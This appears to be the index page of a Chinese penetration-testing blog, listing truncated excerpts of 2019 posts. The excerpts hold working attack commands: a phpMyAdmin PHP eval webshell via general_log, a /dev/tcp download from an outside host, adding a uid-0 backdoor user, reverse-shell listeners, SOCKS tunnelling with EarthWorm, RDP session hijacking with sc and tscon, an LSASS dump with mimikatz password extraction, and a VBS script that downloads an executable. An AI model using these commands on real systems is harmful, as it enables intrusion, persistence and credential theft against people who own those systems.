phpmyadmin getshell 记录

2019年09月08日  No comment

    phpmyadmin getshellselect '<?php @eval($_POST[admin])?>'; show global variables like '%general%'; set global general_log = on; set global gen
阅读全文 »

Windows提权辅助工具Windows-Exploit-Suggester

2019年08月14日  No comment

安装               python 3.3.3安装xlrd库 https://pypi.org/project/xlrd/https://www.python.org/ftp/python/3.3.3/python-3.3.3.amd64.msihttps://www.python.org/ftp/python/3.3.3/python-3.3.
阅读全文 »

linux常用渗透小技巧

2019年08月09日  No comment

无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户useradd -o -u 0 
阅读全文 »

Nmap常用命令

2019年08月06日  No comment

注:本为是笔记,参考多人的文章,仅供大家学习参考。原作者文章链接:https://www.cnblogs.com/hanxiaobei/p/5603491.htmlhttp://blog.jobbole.com/54595/----------------------------------------------------------------------------nmap是网络扫描和主机检测的工具。用nmap进行信息收集和检测漏洞,功能有:  检测存活主机。  检测主机开放端口(端口发
阅读全文 »

记一次曲折的获取网站路径

2019年07月28日  No comment

            网站php mysql 存在sql注入root权限 跑库的时候表是非常多常见的admin member user manage 都看完了 没有找到需要的数据 只能一个一个重新找  最后发现存在管理员的表的是一个不显眼的表里面,登录到后台发现后台只验证账号不验证密码。       &nb
阅读全文 »

powershell反弹shell 的几种方法

2019年07月20日  No comment

    如果想接收多个sessions的话,用msf执行以下命令进行监听    反弹成功以后,用sessions id 来选择要操作的目标    NC反弹msfconsole use exploit/multi/hanler set payload windows/shell/reverse_tcp set lhost 1
阅读全文 »

EarthWorm详细用法

2019年07月17日  No comment

正向socks v5服务器【适用于目标机器拥有一个外网IP】服务器端执行以下命令ew.exe -s ssocksd -l 888说明:服务器开启端口为888,SOCKS的代理。然后使用sockscap64添加这个IP的代理就可以使用了。-------------------------------------------------------------------------------------------反弹socks v5服务器【适用于目标机器没有公网IP,但可访问内网资源】本地执行
阅读全文 »

RDP劫持会话

2019年07月16日  No comment

RDP劫持会话sc create sesshijack binpath="cmd.exe /k tscon 1 /dest:rdp-tcp#46"1为要劫持的会话ID     dest为 sessionname net start sesshijack参考链接https://www.youtube.com/watch?v=OgsoIoWmhWw
阅读全文 »

用Procdump获取win密码

2019年07月16日  No comment

    Procdump出win密码procdump64.exe -accepteula -ma lsass.exe lsass.dmp将导出的日志利用 mimikatz 进行破解mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" 
阅读全文 »

常用的远程下载方法

2019年07月11日  No comment

常用的远程下载方法针对某些服务器禁止上传vbs下载文件Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://www.xxx.com/2.exe",0 Post.Send() Set
阅读全文 »